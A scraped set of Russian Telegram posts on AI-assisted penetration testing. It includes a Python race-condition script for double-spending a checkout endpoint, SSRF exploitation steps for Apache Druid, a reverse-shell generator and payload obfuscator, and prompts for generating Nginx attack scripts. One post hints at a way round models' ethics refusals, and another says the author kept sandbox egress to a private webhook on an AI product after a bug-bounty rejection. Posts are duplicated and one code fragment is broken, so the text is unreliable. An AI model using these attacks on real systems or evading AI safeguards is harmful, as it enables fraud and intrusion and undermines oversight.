Escape Agentic Pentesting на реальном кейсе Pinterest API.
Pinterest использует Agentic LLM для API workflow testing.
Обнаружили race condition в checkout flow: два запроса
API.
Pinterest использует Agentic LLM
Как реализовали
RAG prompt:
Как использовать у себя
Метрика: 87% business logic coverage, 12% false positives.
#ai #PentestAI
Pinterest использует Agentic LLM для API workflow testing.
Обнаружили race condition в checkout flow: два запроса
/purchase с интервалом <50ms - double spend без double charge.API.
Pinterest использует Agentic LLM
x2 → 2 items, 1 payment.
Как реализовали
# Escape Agent pattern (адаптируйте)
class RaceAgent:
def test_checkout(self, api_base):
session = self.login("user")
# Baseline
resp1 = post(f"{api_base}/purchase", json={"item":123}, headers=session)
# Race: parallel + timing < server debounce
import asyncio
async def race_attack():
tasks = [post(f"{api_base}/purchase", json={"item":123}, headers=session)
for _ in range(2)]
return await asyncio.gather(*tasks, return_exceptions=True)
results = asyncio.run(race_attack())
if all(r.status==200 for r in results if not isinstance(r, Exception)):
return {"severity": "CRITICAL", "poc": "double_spend"}
RAG prompt:
return await asyncio.gather(*tasks, return_exceptions=True)
results = a
Как использовать у себя
# 1. Соберите OpenAPI вашего API
escape init myapi --spec checkout.yaml
# 2. Race condition template
escape scan --agent RaceAgent --endpoint /purchase --payloads '{"qty": [1,999]}'
# 3. Custom timing attacks
escape custom --script race_checkout.py
Метрика: 87% business logic coverage, 12% false positives.
#ai #PentestAI
😁1🤨1
🚀 XBOW меняет правила игры в пентесте! Деньги вернут, если уязвимостей не найдено.
15 января XBOW запустили killer-фичу: on-demand PenTest для веб-приложений. Запускаешь тест за минуты, ИИ-агенты ищут глубоко, и если ничего не нашли — полный рефанд! 💰
Почему это будет востребовано?
- Стоит от $6k — в 80 раз быстрее ручного теста (часы, вместо 35–100 дней!).
- Плюс: готовые эксплойты, шаги по фиксу и ретекст. API и веб в фокусе, мобайл на подходе в 2026.
Эксперты сравнивают с Novee: XBOW дешевле и шустрее для малого бизнеса, но Novee рвёт в business logic (90% точность).
Также идем на xbow.com/blog — свежак про "Почему LLM галлюцинируют уязвимости"!
#PentestAI #XBOW #Кибербезопасность #Novee
15 января XBOW запустили killer-фичу: on-demand PenTest для веб-приложений. Запускаешь тест за минуты, ИИ-агенты ищут глубоко, и если ничего не нашли — полный рефанд! 💰
Почему это будет востребовано?
- Стоит от $6k — в 80 раз быстрее ручного теста (часы, вместо 35–100 дней!).
- Плюс: готовые эксплойты, шаги по фиксу и ретекст. API и веб в фокусе, мобайл на подходе в 2026.
Эксперты сравнивают с Novee: XBOW дешевле и шустрее для малого бизнеса, но Novee рвёт в business logic (90% точность).
Также идем на xbow.com/blog — свежак про "Почему LLM галлюцинируют уязвимости"!
#PentestAI #XBOW #Кибербезопасность #Novee
Xbow
XBOW - Why LLMs Hallucinate Vulnerabilities
LLMs are powerful at spotting patterns and proposing possible vulnerabilities, but confidence is not actual proof. In this post, I explain why raw LLM output can’t be trusted as a finding, and why validation must exist outside the model to separate real vulnerabilities…
Заметки Шляпника
🚀 XBOW меняет правила игры в пентесте! Деньги вернут, если уязвимостей не найдено. 15 января XBOW запустили killer-фичу: on-demand PenTest для веб-приложений. Запускаешь тест за минуты, ИИ-агенты ищут глубоко, и если ничего не нашли — полный рефанд! 💰 Почему…
#LLMHallucinations #AIPentest
Разбор - Как XBOW побеждает галлюцинации LLM в пентесте!
LLM в пентесте "галлюцинируют" — выдают фейковые vulns без PoC, это частая проблема с которой я сталкиваюсь.
Что предлогает XBOW: валидация Proof-of-Concept! Каждый агент реально эксплуатирует цель(жестко указывать на составления скрипта для эксплуатации, а если столкнитесь с проблемой этики то можно использовать вот это решение), подтверждая impact (shell, data leak), а не чатит теорию.
Технические детали:
- Механизм: Агент генерит payload → применяет → мониторит response (timeouts, anomalies) - верифицирует (e.g., echo back).
- Пример CVE-2025-55182 (React2Shell): Цепочка XSS - hook React - RCE.
***
#XBOW #CVE #DRUID
Глубокий разбор CVE-2025-27888 от XBOW — SSRF байпасы в Apache Druid!
XBOW нашел CVE-2025-27888: SSRF в /druid/coordinator/v1 позволяет internal scans.
URL-парсинг уязвимости — байпасы через encoding/normalization. Идеально для практики в локальной лабе!
1. Шаги обнаружения
XBOW начал с анализа прошлых SSRF (например, CVE-2023-0361 в /v2/sql), проверил эндпоинты вроде /druid/indexer/v1/task, затем предположил наличие proxy и вызвал ошибку, подтвердившую его существование. Далее последовала итерация атак на /proxy, пока не сработал crafted URL.
2. Техника эксплуатации
Используйте crafted URL в management proxy: /proxy/<role>@host:port/... или /proxy/<role>?url=... для SSRF или редиректа на attacker-controlled ресурсы. Proxy парсит URL некорректно, перенаправляя на внутренние/внешние хосты; требует включенного proxy (по умолчанию).
3. Пофикс
Обновитесь до Apache Druid 31.0.2 или 32.0.1;
Разбор - Как XBOW побеждает галлюцинации LLM в пентесте!
LLM в пентесте "галлюцинируют" — выдают фейковые vulns без PoC, это частая проблема с которой я сталкиваюсь.
Что предлогает XBOW: валидация Proof-of-Concept! Каждый агент реально эксплуатирует цель(жестко указывать на составления скрипта для эксплуатации, а если столкнитесь с проблемой этики то можно использовать вот это решение), подтверждая impact (shell, data leak), а не чатит теорию.
Технические детали:
- Механизм: Агент генерит payload → применяет → мониторит response (timeouts, anomalies) - верифицирует (e.g., echo back).
- Пример CVE-2025-55182 (React2Shell): Цепочка XSS - hook React - RCE.
***
#XBOW #CVE #DRUID
Глубокий разбор CVE-2025-27888 от XBOW — SSRF байпасы в Apache Druid!
XBOW нашел CVE-2025-27888: SSRF в /druid/coordinator/v1 позволяет internal scans.
URL-парсинг уязвимости — байпасы через encoding/normalization. Идеально для практики в локальной лабе!
Короткие шаги эксплуатации CVE-2025-27888 в Apache Druid сводятся к использованию management proxy через специально сформированный URL для SSRF. Требуется аутентификация пользователя. Уязвимость позволяет перенаправлять запросы на произвольные серверы, что приводит к SSRF, open redirect и потенциально XSS/XSRF.
1. Шаги обнаружения
XBOW начал с анализа прошлых SSRF (например, CVE-2023-0361 в /v2/sql), проверил эндпоинты вроде /druid/indexer/v1/task, затем предположил наличие proxy и вызвал ошибку, подтвердившую его существование. Далее последовала итерация атак на /proxy, пока не сработал crafted URL.
2. Техника эксплуатации
Используйте crafted URL в management proxy: /proxy/<role>@host:port/... или /proxy/<role>?url=... для SSRF или редиректа на attacker-controlled ресурсы. Proxy парсит URL некорректно, перенаправляя на внутренние/внешние хосты; требует включенного proxy (по умолчанию).
3. Пофикс
Обновитесь до Apache Druid 31.0.2 или 32.0.1;
Xbow
XBOW - Why LLMs Hallucinate Vulnerabilities
LLMs are powerful at spotting patterns and proposing possible vulnerabilities, but confidence is not actual proof. In this post, I explain why raw LLM output can’t be trusted as a finding, and why validation must exist outside the model to separate real vulnerabilities…
ARES от Assail Inc.
Официальный запуск с февраля 2026
Компания Assail, только что вышедшая из “режима скрытности”, объявила о запуске платформы Ares — первой полностью автономной системы пентестинга на базе AI.
Критическая особенность: Ares может развертывать сотни специализированных AI агентов, каждый сосредоточен на конкретном векторе атаки.
Эти агенты синхронизируются, обмениваются контекстом и выполняют многошаговые цепочки атак как полная команда красных хакеров — но с машинной скоростью.
#news #AIPentest
Официальный запуск с февраля 2026
Компания Assail, только что вышедшая из “режима скрытности”, объявила о запуске платформы Ares — первой полностью автономной системы пентестинга на базе AI.
Критическая особенность: Ares может развертывать сотни специализированных AI агентов, каждый сосредоточен на конкретном векторе атаки.
Эти агенты синхронизируются, обмениваются контекстом и выполняют многошаговые цепочки атак как полная команда красных хакеров — но с машинной скоростью.
#news #AIPentest
PR Newswire
Assail Launches from Stealth with Ares, Autonomous AI Agents for Continuous Penetration Testing Across APIs, Mobile, and Web Infrastructure
/PRNewswire/ -- Assail, Inc., a cybersecurity company building autonomous AI agents for API-first offensive security testing, today announced it is launching...
Обновил Cyber Security Lab — www.tinrae.ru
Главные функции:
• Create DVWA — vulnerable app
• Create Webhook — ловушка для перехвата HTTP-запросов
Обучающие ресурсы, стало проще их использовать для ИИПентестов:
• Six2dez — чеклисты пентеста
• HackTricks — техники эксплуатации
Инструменты (кнопка Tools):
• Base64/URL — encode/decode для bypass фильтров
• JWT Parser — разбор токенов для API тестов
• Hash ID — определение типа хеша (MD5/SHA/bcrypt)
• Rev Shell Generator — Bash/Python/NC/PHP/PowerShell
• Subdomain Finder — поиск через crt.sh
• Obfuscator — обфускация payloads (HTML/Unicode/Hex)
Ежемесячная очистка инстансов, таймер в футере.
#pentest #bugbounty #webtools
Главные функции:
• Create DVWA — vulnerable app
• Create Webhook — ловушка для перехвата HTTP-запросов
Обучающие ресурсы, стало проще их использовать для ИИПентестов:
• Six2dez — чеклисты пентеста
• HackTricks — техники эксплуатации
Инструменты (кнопка Tools):
• Base64/URL — encode/decode для bypass фильтров
• JWT Parser — разбор токенов для API тестов
• Hash ID — определение типа хеша (MD5/SHA/bcrypt)
• Rev Shell Generator — Bash/Python/NC/PHP/PowerShell
• Subdomain Finder — поиск через crt.sh
• Obfuscator — обфускация payloads (HTML/Unicode/Hex)
#pentest #bugbounty #webtools
tinrae.ru
AI-Pentest
Cyber Security Lab: Platform for deploying pentest environments.
Заметки Шляпника pinned «Обновил Cyber Security Lab — www.tinrae.ru Главные функции: • Create DVWA — vulnerable app • Create Webhook — ловушка для перехвата HTTP-запросов Обучающие ресурсы, стало проще их использовать для ИИПентестов: • Six2dez — чеклисты пентеста • HackTricks…»
LLM-баттл: Кто лучше пишет пентест-скрипты?
Прогнал несколько моделей одним промптом на генерацию self-contained Python-скрипта для проверки Nginx-векторов (raw backend, CRLF, path traversal, PURGE, version leak, CVE‑стиль Range).
Один сценарий не делает глобальных выводов, но хорошо показывает разницу в “боевой” пригодности кода.
Так что предлагаю Вам дать мне (подходящий)промт для проверки и я еще раз прогоню.
Промпт-шаблон
Участники
SONAR PRO,
SONAR PRO(DEEP-RESEARCH),
O3,
GPT 5.2,
GEMINI 3 FLASH,
GEMINI 3 PRO,
CLAUDE 4.5 SONNET,
CLAUDE OPUS 4.5,
GROK 4.1 NON-REASONING,
KIMI K2 THINKING
🏆 ТОП-3 чемпионы:
- Sonar Pro – лучший баланс: version leak через regex, продуманный raw backend, path traversal, PURGE, CRLF через POST; чистый структурированный код.
- OpenAI o3 – сильное покрытие: http/https, оба порта, raw backend, traversal, PURGE, аккуратный Range‑тест под CVE‑2017‑7529.
- Claude 4.5 Sonnet – очень “человеческий” скрипт: HEAD/GET, nginx-version regex, несколько traversal‑паттернов, CRLF через заголовки, Range‑проверка; чуть менее универсален по URL, но очень качественный.
⭐ Сильные середнячки, но на полступени ниже
- Claude 4.5 Opus – много тестов (raw HTTP в POST, traversal, CRLF Set‑Cookie, метод‑фуззинг), но без явного CVE Range и multi-port.
- Sonar Pro Deep Research, Gemini 3 Pro, Grok 4.1 non‑reasoning, Kimi K2 Thinking – рабочие скрипты с нормальным покрытием, но менее аккуратной логикой и/или структурой, чем у топ‑3.
😬 Слабые на этом кейсе
- Gemini 3 Flash – по сути логирование статусов/Server с захардкоженными путями и почти без логики “vuln/ok”.
- GPT‑5.2 – красивые `VULNERABLE/SAFE`, но условия упрощены и местами странные (например, `url.rstrip()` в traversal).
#Pentest #AI #LLM #CyberSec
Прогнал несколько моделей одним промптом на генерацию self-contained Python-скрипта для проверки Nginx-векторов (raw backend, CRLF, path traversal, PURGE, version leak, CVE‑стиль Range).
Один сценарий не делает глобальных выводов, но хорошо показывает разницу в “боевой” пригодности кода.
Промпт-шаблон
```text
You are a professional penetration tester and security researcher.
Создай self-contained Python-скрипт для теста Nginx уязвимостей (raw backend/CRLF/path traversal/PURGE/version leak/CVE).
TARGET RECON: HOST/IP, ports 80/443, nginx, known endpoints...
Скрипт сам запускается, выводит результаты в stdout, без аргументов и лишних зависимостей.
```
Участники
SONAR PRO,
SONAR PRO(DEEP-RESEARCH),
O3,
GPT 5.2,
GEMINI 3 FLASH,
GEMINI 3 PRO,
CLAUDE 4.5 SONNET,
CLAUDE OPUS 4.5,
GROK 4.1 NON-REASONING,
KIMI K2 THINKING
🏆 ТОП-3 чемпионы:
- Sonar Pro – лучший баланс: version leak через regex, продуманный raw backend, path traversal, PURGE, CRLF через POST; чистый структурированный код.
- OpenAI o3 – сильное покрытие: http/https, оба порта, raw backend, traversal, PURGE, аккуратный Range‑тест под CVE‑2017‑7529.
- Claude 4.5 Sonnet – очень “человеческий” скрипт: HEAD/GET, nginx-version regex, несколько traversal‑паттернов, CRLF через заголовки, Range‑проверка; чуть менее универсален по URL, но очень качественный.
⭐ Сильные середнячки, но на полступени ниже
- Claude 4.5 Opus – много тестов (raw HTTP в POST, traversal, CRLF Set‑Cookie, метод‑фуззинг), но без явного CVE Range и multi-port.
- Sonar Pro Deep Research, Gemini 3 Pro, Grok 4.1 non‑reasoning, Kimi K2 Thinking – рабочие скрипты с нормальным покрытием, но менее аккуратной логикой и/или структурой, чем у топ‑3.
😬 Слабые на этом кейсе
- Gemini 3 Flash – по сути логирование статусов/Server с захардкоженными путями и почти без логики “vuln/ok”.
- GPT‑5.2 – красивые `VULNERABLE/SAFE`, но условия упрощены и местами странные (например, `url.rstrip()` в traversal).
#Pentest #AI #LLM #CyberSec
👍1
Please open Telegram to view this post
VIEW IN TELEGRAM
😁2
Опубликованная на этой неделе исследовательская работа «Towards Cybersecurity Superintelligence: from AI-guided humans to human-guided AI» документирует появление способностей, превосходящих человеческие возможности как в скорости, так и в стратегическом мышлении.
Работа определяет три ключевых вектора с примерами развития ИИ-безопасности:
PentestGPT (2023): Первая система, установившая стандарт LLM-управляемого тестирования на проникновение с улучшением производительности на 228,6% по сравнению с базовыми моделями. Система использовала архитектуру, экспортирующую экспертизу в области безопасности в естественно-языковые указания.
Cybersecurity AI (CAI, 2025): Продемонстрировала автоматическое экспертное выполнение на уровне, недоступном человеку. CAI работает в 3600 раз быстрее, чем человеческие тестеры, и сокращает затраты в 156 раз. В 2025 году CAI заняла первое место на международных соревнованиях, включая победу на Neurogrid CTF с призом в 50 000 долларов.
Generative Cut-the-Rope (G-CTR, 2026): Представляет нейросимволическую архитектуру, встраивающую теоретико-игровое мышление в LLM-агентов. Система удваивает процент успеха и достигает преимущества 2:1 над не-стратегическим ИИ в сценариях Attack&Defense.
#ai #aiPentest #news
Работа определяет три ключевых вектора с примерами развития ИИ-безопасности:
PentestGPT (2023): Первая система, установившая стандарт LLM-управляемого тестирования на проникновение с улучшением производительности на 228,6% по сравнению с базовыми моделями. Система использовала архитектуру, экспортирующую экспертизу в области безопасности в естественно-языковые указания.
Cybersecurity AI (CAI, 2025): Продемонстрировала автоматическое экспертное выполнение на уровне, недоступном человеку. CAI работает в 3600 раз быстрее, чем человеческие тестеры, и сокращает затраты в 156 раз. В 2025 году CAI заняла первое место на международных соревнованиях, включая победу на Neurogrid CTF с призом в 50 000 долларов.
Generative Cut-the-Rope (G-CTR, 2026): Представляет нейросимволическую архитектуру, встраивающую теоретико-игровое мышление в LLM-агентов. Система удваивает процент успеха и достигает преимущества 2:1 над не-стратегическим ИИ в сценариях Attack&Defense.
#ai #aiPentest #news
arXiv.org
Towards Cybersecurity Superintelligence: from AI-guided humans to...
Cybersecurity superintelligence -- artificial intelligence exceeding the best human capability in both speed and strategic reasoning -- represents the next frontier in security. This paper...
🥱1
Эра человеческого кода завершена: что это значит для разработчиков.
Райан Даль, создатель Node.js, заявил в X, что «эра написания кода людьми подошла к концу». Это высказывание вызвало бурные обсуждения в сообществе разработчиков, но что на самом деле имел в виду автор одной из самых популярных платформ для разработки?
Не исчезновение профессии, а эволюция
Даль подчёркивает: речь не о том, что разработчики остаются без работы. Суть в другом — ручное написание синтаксиса перестаёт быть основной ценностью инженера. Работа смещается от «написать каждую строчку кода» к формулированию требований, проектированию архитектуры и верификации результатов, которые генерируют ИИ-инструменты.
#ai #news
Райан Даль, создатель Node.js, заявил в X, что «эра написания кода людьми подошла к концу». Это высказывание вызвало бурные обсуждения в сообществе разработчиков, но что на самом деле имел в виду автор одной из самых популярных платформ для разработки?
Не исчезновение профессии, а эволюция
Даль подчёркивает: речь не о том, что разработчики остаются без работы. Суть в другом — ручное написание синтаксиса перестаёт быть основной ценностью инженера. Работа смещается от «написать каждую строчку кода» к формулированию требований, проектированию архитектуры и верификации результатов, которые генерируют ИИ-инструменты.
#ai #news
X (formerly Twitter)
Ryan Dahl (@rough__sea) on X
This has been said a thousand times before, but allow me to add my own voice: the era of humans writing code is over. Disturbing for those of us who identify as SWEs, but no less true. That's not to say SWEs don't have work to do, but writing syntax directly…
LLM‑driven сенсор: как научить ИИ видеть уязвимости по поведению, а не по строкам
Long story short: большинство ранних экспериментов с AI‑детекцией уязвимостей выглядели так — загрузили audit‑логи, дали модели флаг injection=true/false, проверили точность.
Работает для стенда, но в продакшене быстро упирается в контекст: модель видит “admin”, “users” и решает, что это SQLi, хотя это просто интерфейс.
Я столкнулся с этой проблемой, когда подключил LLM к DVWA и понял — модель учится не “понятию SQLi”, а просто узнавать строки, характерные для тренажёра. В итоге переносимость нулевая.
Так появилась идея универсального сенсора, который не решает “уязвимость это или нет”, а лишь структурирует поведение приложения. Он строит baseline‑ответ, отправляет payload, сохраняет дифф (HTML, JSON, CLI) и метаданные. Никакой логики, только факты изменений.
Важно, что здесь нет жёстких правил про названия полей или таблиц — работает только поведенческая логика.
Это превращает ИИ‑анализ в универсальный слой между пентест‑инструментом и приложением. Теперь модель не “угадывает DVWA”, а интерпретирует реальные признаки аномального поведения.
Что это меняет?
Такой подход формирует новую парадигму — поведенческое восприятие уязвимостей. LLM перестаёт быть распознавателем строк и становится интерпретатором взаимодействия.
Это шаг к созданию Behavior‑diff Sensor Framework — базовой прослойки для автономных AI‑сканеров, которые могут адаптироваться к любому стеку без retrain’а.
Думаю опубликовать первые эксперименты с универсальным дифф‑сенсором — как только добью формат baseline и diff‑структур. Интересно, кто уже пробовал нечто похожее в своих пайплайнах?
Long story short: большинство ранних экспериментов с AI‑детекцией уязвимостей выглядели так — загрузили audit‑логи, дали модели флаг injection=true/false, проверили точность.
Работает для стенда, но в продакшене быстро упирается в контекст: модель видит “admin”, “users” и решает, что это SQLi, хотя это просто интерфейс.
Я столкнулся с этой проблемой, когда подключил LLM к DVWA и понял — модель учится не “понятию SQLi”, а просто узнавать строки, характерные для тренажёра. В итоге переносимость нулевая.
Так появилась идея универсального сенсора, который не решает “уязвимость это или нет”, а лишь структурирует поведение приложения. Он строит baseline‑ответ, отправляет payload, сохраняет дифф (HTML, JSON, CLI) и метаданные. Никакой логики, только факты изменений.
ПРИМЕР: Анализ переносится в LLM: она определяет совпадения между типом payload и паттерном диффа.
– SQL‑payload + новые табличные структуры или SQL‑ошибка → SQLi
– файловые пути, /etc/passwd, исходники → LFI/RFI
– отражённый HTML/JS без экранирования → XSS
Важно, что здесь нет жёстких правил про названия полей или таблиц — работает только поведенческая логика.
Архитектура проста:
1. Сенсор фиксирует структурированные различия и флаги вида content_changed, http_error, sensitive_keyword_found;
2. Модель оценивает риски на уровне паттернов поведения.
Это превращает ИИ‑анализ в универсальный слой между пентест‑инструментом и приложением. Теперь модель не “угадывает DVWA”, а интерпретирует реальные признаки аномального поведения.
Что это меняет?
Такой подход формирует новую парадигму — поведенческое восприятие уязвимостей. LLM перестаёт быть распознавателем строк и становится интерпретатором взаимодействия.
Это шаг к созданию Behavior‑diff Sensor Framework — базовой прослойки для автономных AI‑сканеров, которые могут адаптироваться к любому стеку без retrain’а.
Pilot: от discovery к готовым векторам для exploitation за один проход
Предыстория:
После поста про behavior‑diff сенсор логично возникает вопрос — как найти где именно тестировать?
Ручной парсинг HTML, сбор форм и кликабельных элементов с метаданными — рутина, которая съедает часы. Плюс нужно помнить, какие параметры в каких контекстах (vuln_area, main_body, onclick‑попапы).
Решение — pilot(Перове что пришло в голову ), скрипт, который за 4 фазы превращает URL в готовый отчёт с приоритетными векторами для exploitation.
Результат на DVWA:
FINDING #1: Potential SQL Injection
Sensor показал: id=1 - 4533 bytes (данные вернулись), id=test - 4474 baseline (нет данных).
Вывод: прямое попадание в SQL WHERE без санитизации.
Что меняет pilot:
Вместо “найди форму - придумай тесты - запусти - проанализируй” получаем end‑to‑end конвейер:
Это мост между behavior‑diff сенсором (из предыдущего поста) и реальным pentest: pilot находит где, сенсор тестирует как, LLM создает скрипты и решает уязвимость или нет.
Предыстория:
После поста про behavior‑diff сенсор логично возникает вопрос — как найти где именно тестировать?
Ручной парсинг HTML, сбор форм и кликабельных элементов с метаданными — рутина, которая съедает часы. Плюс нужно помнить, какие параметры в каких контекстах (vuln_area, main_body, onclick‑попапы).
Решение — pilot(
Как это работает:
Фаза 1: Local discovery — парсит HTML, находит формы, кликабельные элементы, трекает in_vuln_area, in_main_body, пути обнаружения (html > body > div.vulnerable_code_area > form > input[name='id']).
Фаза 2: LLM‑генерация сенсора — модель пишет Python‑скрипт для безопасного тестирования обнаруженных параметров (1, 42, test, empty).
Фаза 3: Автофикс — если сенсор упал, модель чинит его по stderr.
Фаза 4: Анализ — LLM выдаёт готовый отчёт с FINDING #N и exploitation guidance.
Результат на DVWA:
FINDING #1: Potential SQL Injection
URL: https://tinrae.ru/.../sqli/
Parameter: id
Discovery Path: html > body.home.light > div#container > div#main_body > div.vulnerable_code_area > form > input[name='id']
Sensor показал: id=1 - 4533 bytes (данные вернулись), id=test - 4474 baseline (нет данных).
Вывод: прямое попадание в SQL WHERE без санитизации.
Что меняет pilot:
Вместо “найди форму - придумай тесты - запусти - проанализируй” получаем end‑to‑end конвейер:
URL → структурированный discovery → поведенческие тесты → готовые векторы exploitation.
Это мост между behavior‑diff сенсором (из предыдущего поста) и реальным pentest: pilot находит где, сенсор тестирует как, LLM создает скрипты и решает уязвимость или нет.
Telegram
Заметки Шляпника
LLM‑driven сенсор: как научить ИИ видеть уязвимости по поведению, а не по строкам
Long story short: большинство ранних экспериментов с AI‑детекцией уязвимостей выглядели так — загрузили audit‑логи, дали модели флаг injection=true/false, проверили точность.…
Long story short: большинство ранних экспериментов с AI‑детекцией уязвимостей выглядели так — загрузили audit‑логи, дали модели флаг injection=true/false, проверили точность.…
Вот мне нравиться как устроено BB, что у Perplexity что у Google, просто считаем что уязвимости нет и она не входит в программу, а потом исправляем ее.
Начинает подбешивать...
Предыстория: Perplexity сказал что доступ к песочнице это ерунда, ну ладно, подумал я, оставлю для своих целей отправку из песочницы запрос на свой веб-хук, сегодня тестирую и все, не работает, ограничилисволочи внешние запросы..., и каждый раз они еще издеваются и пишут "Спасибо за участие, приходите еще"...
доколе???
&#&$#$$#$<- тут маты
Начинает подбешивать...
Предыстория: Perplexity сказал что доступ к песочнице это ерунда, ну ладно, подумал я, оставлю для своих целей отправку из песочницы запрос на свой веб-хук, сегодня тестирую и все, не работает, ограничили
доколе???
&#&$#$$#$
Qwen3-Max-Thinking от Alibaba превосходит ChatGPT в задачах, требующих структурированного мышления, технического решения проблем и автоматического использования инструментов, согласно обзору Tom's Guide. Модель показывает пошаговую логику, меньше ошибается в сложных сценариях и обходится дешевле — $1.20 за миллион входных токенов.
Ключевые преимущества
- Автоматическое мышление: Модель сама переключается между поиском в вебе, выполнением кода и самопроверкой без подсказок пользователя, в отличие от ChatGPT, где часто нужно уточнять.
- Лучшая точность в сложных задачах: На бенчмарках вроде LiveCodeBench и GPQA-Diamond показывает результаты на уровне или выше GPT-5.2-Thinking, особенно в программировании и агентских сценариях.
- Прозрачность: "Thinking Mode" отображает цепочку рассуждений в реальном времени, повышая доверие к ответам.
Модель особенно полезна для разработчиков и пентестеров в задачах вроде отладки или анализа уязвимостей.
Qwen3-Max-Thinking уступает ChatGPT в скорости отклика и простых задачах, где “тяжёлое мышление” добавляет ненужную задержку. Модель слабее в творческих сценариях, генерации длинных coherent текстов и некоторых нишевых кодовых задачах, где ChatGPT показывает большую надёжность
#ai #llm #pentestAI
Ключевые преимущества
- Автоматическое мышление: Модель сама переключается между поиском в вебе, выполнением кода и самопроверкой без подсказок пользователя, в отличие от ChatGPT, где часто нужно уточнять.
- Лучшая точность в сложных задачах: На бенчмарках вроде LiveCodeBench и GPQA-Diamond показывает результаты на уровне или выше GPT-5.2-Thinking, особенно в программировании и агентских сценариях.
- Прозрачность: "Thinking Mode" отображает цепочку рассуждений в реальном времени, повышая доверие к ответам.
Модель особенно полезна для разработчиков и пентестеров в задачах вроде отладки или анализа уязвимостей.
Qwen3-Max-Thinking уступает ChatGPT в скорости отклика и простых задачах, где “тяжёлое мышление” добавляет ненужную задержку. Модель слабее в творческих сценариях, генерации длинных coherent текстов и некоторых нишевых кодовых задачах, где ChatGPT показывает большую надёжность
#ai #llm #pentestAI
tom's guide
I replaced ChatGPT with Alibaba’s new reasoning model for a day — here’s what Qwen3-Max-Thinking does better
For a long time, advanced AI reasoning felt like a Western stronghold. If you wanted step-by-step logic, deep explanations or agent-style workflows, your realistic options were
❤1
Документ рассказывает о победе команды FR13NDS TEAM на соревновании KHS 2025, где AI использовался как "допинг" для хакеров.
Основная тема
Это история успеха казахстанской команды (топ-1 в КЗ по CTF), которая выиграла в категории Red Team.
Роль AI
Подробно разбирается, как AI-модели (Gemini 3 Pro, GPT-5.2-Codex, Claude Opus) помогали в реконах, эксплуатации, кодинге и анализе (рейтинги по категориям: Web, Pwn, Forensic). Упомянуты инструменты вроде Warp Terminal, MCP, RAG и vibe hacking с терминалами.
Примеры эксплойтов
- Взлом SPIP CMS, GilaCMS, LuminTech (сессии в DynamoDB).
- Форензика, Pwn-задачи, Blue Team (ELK Stack, forensics).
- Советы по подготовке и Tier List AI-инструментов для CTF.
Основная тема
Это история успеха казахстанской команды (топ-1 в КЗ по CTF), которая выиграла в категории Red Team.
Роль AI
Подробно разбирается, как AI-модели (Gemini 3 Pro, GPT-5.2-Codex, Claude Opus) помогали в реконах, эксплуатации, кодинге и анализе (рейтинги по категориям: Web, Pwn, Forensic). Упомянуты инструменты вроде Warp Terminal, MCP, RAG и vibe hacking с терминалами.
Примеры эксплойтов
- Взлом SPIP CMS, GilaCMS, LuminTech (сессии в DynamoDB).
- Форензика, Pwn-задачи, Blue Team (ELK Stack, forensics).
- Советы по подготовке и Tier List AI-инструментов для CTF.
Telegram
s0ld13r ch.